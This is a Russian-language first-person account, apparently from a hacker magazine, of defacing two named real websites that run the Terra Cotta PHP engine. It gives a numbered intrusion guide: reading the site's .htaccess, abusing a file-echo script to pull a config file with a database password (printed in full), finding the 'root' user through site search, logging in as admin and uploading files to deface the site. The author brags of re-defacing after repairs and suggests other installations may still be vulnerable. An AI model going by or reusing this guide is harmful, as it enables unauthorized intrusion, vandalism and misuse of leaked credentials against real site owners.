Дефейсу поверглись 2 родственных сайта, www.terracottasoftware.com
и www.thebilberry.com,
лежащие в соседних папках на одном серваке, но я не успел
дефейс нигде зафиксировать так как уже через 15 минут сервер стал недоступен. 27 февраля сервер ожил.
www.thebilberry.com был восстановлен, а вот на www.terracottasoftware.com почему-то
дефейс по-прежнему стоял. Обновили Apache, РНР, Sendmail, закрыли 3306,113, 1024 порты,
оставив открытыми всего 3 порта: 80, 25, 143. Я задефейсил сайты повторно и быстренько оформил
это дело на void-е. Потом вернул все на свои места, почти. 

На обоих сайтах стоит сайтовый движок на РНР — Terra Cotta.
www.terracottasoftware.com — это сайт разработчиков, который доступен сейчас по адресу
www.terracottasoftware.com/index2.php3. Судя по большому количеству пользователей,
зарегистрированных на сайте, возможно в сети все еще есть сайты на этом движке.
Первым подвергся дефейсу www.thebilberry.com, поэтому о нем я и расскажу.
Для www.terracottasoftware.com все так же 100%. Может то, что я сейчас напишу и детский сад,
но я сделал так насколько позволили мне мои знания, по крайней мере я не пользовался никакими
чужими наработками, все чистой воды мои придумки. 

Вот инструкция: 

1. В оперу — www.thebilberry.com/.htaccess 
Получаем в окне оперы: 
php_value auto_prepend_file «/u/web/tc/core/local.mdl» order deny,allow deny from all 

2. Пробуем на доступ перечисленные выше папки, в итоге: 
www.thebilberry.com/tc/ 
Получаем : Index of /tc + кучу файлов и папок 

3. Идем в www.thebilberry.com/tc/core/ 
Пробуем открыть www.thebilberry.com/tc/core/local.mdl — отказано в доступе. 
Пробуем открыть www.thebilberry.com/tc/core/local.mdl.dist — ничего интересного. 
Пробуем открывать все что там лежит. 

4. www.thebilberry.com/tc/core/corenucl.php3 — запускается. 
Получаем в окне оперы много чего, но из этого многого обращаем внимание на такую строчку: 
http://www.thebilberry.com/tc/nucleus/echoout.php3 ?auth=2f49f92cfa2bce7464e871c79c673aa3&file=
%2Ftc%2Fcore%2Flocal.mdl.dist

5. local.mdl.dist — нас не интересует поэтому заказываем local.mdl 
http://www.thebilberry.com/tc/nucleus/echoout.php3 ?auth=2f49f92cfa2bce7464e871c79c673aa3&file=
%2Ftc%2Fcore%2Flocal.mdl 
Получаем пустое окно 

6. Даем команду отобразить исходный текст. Среди прочего замечаем интересное: 
$TC_LOCALDATA[«dbuser»] = «web»; 
$TC_LOCALDATA[«dbpw»] = «Dv4b074a»; 

7. Ищем куда бы можно было бы это ввести. Находим: 
www.thebilberry.com/tc/login/index.php3 
Вводим в поля Login : web 
Password : Dv4b074a 
Неверное имя или пароль. 

8. Предположим, что неверен логин (другое предполагать не хочется). Можно конечно попробовать другие стандартные логины наугад, а можно поступить продуктивнее. 

9. Ищем скрипт осуществляющий поиск по сайту:
www.thebilberry.com/tc/index/index.php3 

Вводим в появившееся поле «web» 
No matching users 
Вводим «admin» 
No matching users 
Вводим «root» 
Search Results: 
Users 
root 
Есть! 

10. Гоу ту пункт 7 и вводим: 
Login : root 
Password : Dv4b074a 
Выбрасывает на главную страницу сайта. 

11. Предполагаем, что теперь у нас есть административные полномочия и заходим в
www.thebilberry.com/tc/admin/.

12. Все ОК, открывается административная страница в которой расположены ссылки на все установленные модули Terra Cotta. 

Вот в общем-то и все. Для дефейса нас интересует ссылка что-то типа Files manager
с админовской страницы. В открывшемся окне можно что угодно делать с файлами в директории сайта.
Кроме того, там же есть ссылка предлагающая загрузить что-либо на сайт.
По ней откроется окно, в котором щелкнув по кнопке обзор необходимо указать файл на своем компе который и будет
перемещен на сайт. 

Да и еще, в пункте 5 приведенная строка работает только 1 раз.
Если необходимо еще раз загрузить local.mdl, то необходимо вернуться к пункту 4
и загрузить новый вариант этой строки. Ну и пароль я несколько
изменил. Для того, чтобы быстро находить нужные скрипты на сайте можно
скачать сам движок terracotta.tar.gz с www.terracottasoftware.com,
распакованный в папку tc он полностью повторяет структуру сайта,
а документация в целом объясняет, что для чего нужно.
Вот пожалуй и все, что я хотел рассказать.

Оставить мнение

Check Also

В гостях у чертёнка. FreeBSD глазами линуксоида

Порог вхождения новичка в мир Linux за последние десять-пятнадцать лет ощутимо снизился. О…